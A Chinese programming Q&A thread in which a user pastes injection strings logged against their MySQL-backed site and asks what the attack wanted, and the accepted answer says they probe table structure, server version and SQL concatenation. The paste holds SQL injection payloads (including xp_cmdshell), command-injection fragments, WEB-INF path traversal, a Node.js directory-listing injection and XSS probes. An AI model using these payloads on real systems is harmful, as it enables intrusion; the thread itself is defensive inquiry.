loda7023link 2018-01-19 03:27 采纳率: 33.3%
浏览 2105
已采纳

MySQL数据库大神进来看看,这一类SQL注入攻击的目的是什么,要获取我什么东西

 "'
res.end(require('fs').readdirSync('.').toString())
res.end(require('fs').readdirSync('.').toString())
"Aryprobehb0004C6
Aryprobehb0004C6
ryprobehb0004C6
ryprobehb0004C6
\WEB-INF\web.xml
//….//WEB-INF/web.xml
\..\WEB-INF\web.xml
/../WEB-INF/web.xml
(select )
/WEB-INF/web.xml
 + ltrim('') + '
AVAK$(RETURN_CODE)OS
 || '' || '
;vol
||vol
 exec master..xp_cmdshell 'ver'-- 
%' and 'f%'='f
 and 'f'='f') -- 
" | "vol
 | 'vol
&&vol
 and 'f'='f
 and 'f'='f' -- 
|vol
)
\"
;
"


\'
#&<(,+">;
�' having 1=1--
) having 1=1--
; select * from sys.dba_users--
\' having 1=1--
; select * from dbo.sysdatabases--
; select * from master..sysmessages--
1 having 1=1--
; select @@version,1,1,1--
 having 1=1--
"

�' having 1=1-- 

) having 1=1-- 
\' having 1=1-- 
";SELECT 1;
1 having 1=1-- 
; select @@version,1,1,1-- 
;
 having 1=1-- 
; select * from sys.dba_users-- 
; select * from dbo.sysdatabases-- 
; select * from master..sysmessages-- 
ProbePhishing
WFXSSProbe
AB
"
WF'SQL"Probe;A--B
WFXSSProbe'")/>
\WEB-INF\web.xml
"Aryprobehb0004B5
\..\WEB-INF\web.xml
res.end(require('fs').readdirSync('.').toString())
/../WEB-INF/web.xml
res.end(require('fs').readdirSync('.').toString())
\"
"
res.end(require('fs').readdirSync('.').toString())
)
\..\WEB-INF\web.xml
 | 'vol
Aryprobehb0004B5
||vol
(select )
ryprobehb0004B5
;vol
AVAK$(RETURN_CODE)OS
"'
\"
 || '' || '
"'
ryprobehb0004B5
" | "vol
;vol
//….//WEB-INF/web.xml
/WEB-INF/web.xml
res.end(require('fs').readdirSync('.').toString())
\WEB-INF\web.xml
" | "vol
;
 + ltrim('') + '
)

\'
 + ltrim('') + '
 and 'f'='f') -- 
"
|vol
&&vol
/WEB-INF/web.xml

(select )
;
 | 'vol
%' and 'f%'='f
 exec master..xp_cmdshell 'ver'-- 

&&vol
%' and 'f%'='f
 and 'f'='f' -- 
#&<(,+">;
||vol
|vol
 and 'f'='f
#&<(,+">;
 exec master..xp_cmdshell 'ver'-- 
AVAK$(RETURN_CODE)OS
 and 'f'='f') -- 

//….//WEB-INF/web.xml
\'
/../WEB-INF/web.xml
 || '' || '
 and 'f'='f
 and 'f'='f' -- 
; select * from sys.dba_users--
\' having 1=1--
�' having 1=1--
) having 1=1--
1 having 1=1--
\' having 1=1--
�' having 1=1--
) having 1=1--
; select * from sys.dba_users--
; select * from dbo.sysdatabases--
; select * from master..sysmessages--
; select @@version,1,1,1--
; select @@version,1,1,1--
 having 1=1--
 having 1=1--
; select * from dbo.sysdatabases--
; select * from master..sysmessages--
1 having 1=1--
�' having 1=1-- 
"

"



�' having 1=1-- 
1 having 1=1-- 
";SELECT 1;
";SELECT 1;
) having 1=1-- 
) having 1=1-- 
\' having 1=1-- 
1 having 1=1-- 
\' having 1=1-- 
 having 1=1-- 
;
; select * from master..sysmessages-- 
; select @@version,1,1,1-- 
; select * from master..sysmessages-- 
 having 1=1-- 
;
; select @@version,1,1,1-- 
WFXSSProbe
; select * from dbo.sysdatabases-- 
; select * from sys.dba_users-- 
; select * from sys.dba_users-- 
; select * from dbo.sysdatabases-- 
WFXSSProbe
WF'SQL"Probe;A--B
ProbePhishing
"
"
WF'SQL"Probe;A--B
ProbePhishing
WFXSSProbe'")/>
AB
AB
WFXSSProbe'")/>

  • 写回答

3条回答 默认 最新

  • threenewbee 2018-01-19 05:31
    关注

    这里有很多试探,比如说试探你的数据库的表结构select * from sys.dba_users--,试探你的服务器的软件环境select @@version,1,1,1--
    试探你的程序是不是js拼接的sql(比如nodejs) + ltrim('') + '
    还有一些可能是针对某个特定web系统的漏洞,等等。

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论
查看更多回答(2条)

报告相同问题?

悬赏问题

  • ¥15 如何在scanpy上做差异基因和通路富集?
  • ¥20 关于#硬件工程#的问题,请各位专家解答!
  • ¥15 关于#matlab#的问题:期望的系统闭环传递函数为G(s)=wn^2/s^2+2¢wn+wn^2阻尼系数¢=0.707,使系统具有较小的超调量
  • ¥15 FLUENT如何实现在堆积颗粒的上表面加载高斯热源
  • ¥30 截图中的mathematics程序转换成matlab
  • ¥15 动力学代码报错,维度不匹配
  • ¥15 Power query添加列问题
  • ¥50 Kubernetes&Fission&Eleasticsearch
  • ¥15 報錯:Person is not mapped,如何解決?
  • ¥15 c++头文件不能识别CDialog